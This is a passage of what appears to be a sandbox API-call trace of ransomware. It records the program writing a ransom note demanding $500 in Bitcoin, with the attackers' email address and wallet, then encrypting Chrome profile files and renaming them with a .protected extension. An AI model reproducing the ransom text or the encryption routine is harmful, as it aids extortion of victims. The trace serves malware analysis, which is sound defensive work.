pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt") returned 154 [0084.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.362] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.362] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.363] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.363] WriteFile (in: hFile=0x158, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.363] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.363] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.363] CloseHandle (hObject=0x158) returned 1 [0084.363] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.363] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\RESTORE_FILES.txt") returned 121 [0084.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.364] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.364] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.365] lstrlenA (lpString="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") returned 684 [0084.365] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.365] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.365] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.365] CloseHandle (hObject=0x154) returned 1 [0084.365] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="Windows") returned -1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="Program Files") returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="Program Files (x86)") returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="$Recycle.bin") returned 1 [0084.365] lstrcmpiW (lpString1="Top Sites", lpString2="System Volume Information") returned 1 [0084.366] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.366] StrStrIW (lpFirst="Top Sites", lpSrch=".protected") returned 0x0 [0084.366] lstrcmpW (lpString1="Top Sites", lpString2="RESTORE_FILES.txt") returned 1 [0084.366] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.366] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.367] StrStrW (lpFirst="Top Sites", lpSrch=".txt") returned 0x0 [0084.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.367] StrStrW (lpFirst="Top Sites", lpSrch=".rar") returned 0x0 [0084.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0084.367] StrStrW (lpFirst="Top Sites", lpSrch=".zip") returned 0x0 [0084.367] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.368] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.368] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.369] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.369] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.369] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.370] CloseHandle (hObject=0x154) returned 1 [0084.372] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.protected") returned 99 [0084.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites.protected")) returned 1 [0084.373] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="Windows") returned -1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="Program Files") returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="Program Files (x86)") returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="$Recycle.bin") returned 1 [0084.373] lstrcmpiW (lpString1="Top Sites-journal", lpString2="System Volume Information") returned 1 [0084.373] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.373] StrStrIW (lpFirst="Top Sites-journal", lpSrch=".protected") returned 0x0 [0084.373] lstrcmpW (lpString1="Top Sites-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.373] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.373] CryptEncrypt (in: hKey=0x444cf8, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.374] StrStrW (lpFirst="Top Sites-journal", lpSrch=".txt") returned 0x0 [0084.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.374] StrStrW (lpFirst="Top Sites-journal", lpSrch=".rar") returned 0x0 [0084.374] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0084.374] StrStrW (lpFirst="Top Sites-journal", lpSrch=".zip") returned 0x0 [0084.374] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.374] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.374] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0084.375] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0084.375] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.375] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.376] CloseHandle (hObject=0x154) returned 1 [0084.376] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.protected") returned 107 [0084.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal.protected")) returned 1 [0084.377] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="Windows") returned -1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="Program Files") returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="Program Files (x86)") returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="$Recycle.bin") returned 1 [0084.377] lstrcmpiW (lpString1="TransportSecurity", lpString2="System Volume Information") returned 1 [0084.377] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.377] StrStrIW (lpFirst="TransportSecurity", lpSrch=".protected") returned 0x0 [0084.377] lstrcmpW (lpString1="TransportSecurity", lpString2="RESTORE_FILES.txt") returned 1 [0084.377] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.378] StrStrW (lpFirst="TransportSecurity", lpSrch=".txt") returned 0x0 [0084.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.378] StrStrW (lpFirst="TransportSecurity", lpSrch=".rar") returned 0x0 [0084.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity") returned 97 [0084.378] StrStrW (lpFirst="TransportSecurity", lpSrch=".zip") returned 0x0 [0084.378] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x278, lpOverlapped=0x0) returned 1 [0084.386] 
SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffd88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.386] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x278, lpOverlapped=0x0) returned 1 [0084.386] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.387] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.387] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.387] CloseHandle (hObject=0x154) returned 1 [0084.387] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.protected") returned 107 [0084.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity.protected")) returned 1 [0084.389] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.389] lstrcmpiW (lpString1="Visited 
Links", lpString2="Windows") returned -1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="Program Files") returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="Program Files (x86)") returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="$Recycle.bin") returned 1 [0084.389] lstrcmpiW (lpString1="Visited Links", lpString2="System Volume Information") returned 1 [0084.389] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.389] StrStrIW (lpFirst="Visited Links", lpSrch=".protected") returned 0x0 [0084.389] lstrcmpW (lpString1="Visited Links", lpString2="RESTORE_FILES.txt") returned 1 [0084.389] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.389] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.390] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.390] StrStrW (lpFirst="Visited Links", lpSrch=".txt") returned 0x0 [0084.390] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.390] StrStrW (lpFirst="Visited Links", lpSrch=".rar") returned 0x0 [0084.390] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0084.390] StrStrW (lpFirst="Visited Links", lpSrch=".zip") returned 0x0 [0084.391] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.393] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.393] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0084.393] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.394] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.394] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.394] CloseHandle (hObject=0x154) returned 1 [0084.394] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.protected") returned 103 [0084.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links.protected")) returned 1 [0084.395] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="Windows") returned -1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="Program Files") returned 1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="Program Files (x86)") returned 1 [0084.395] lstrcmpiW (lpString1="Web Applications", lpString2="$Recycle.bin") returned 1 [0084.396] lstrcmpiW (lpString1="Web Applications", lpString2="System Volume Information") returned 1 [0084.396] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned 96 [0084.396] lstrcmpW (lpString1="Web Applications", lpString2=".") returned 1 [0084.396] lstrcmpW (lpString1="Web Applications", lpString2="..") returned 1 [0084.396] wnsprintfW (in: pszDest=0x4bfb20, 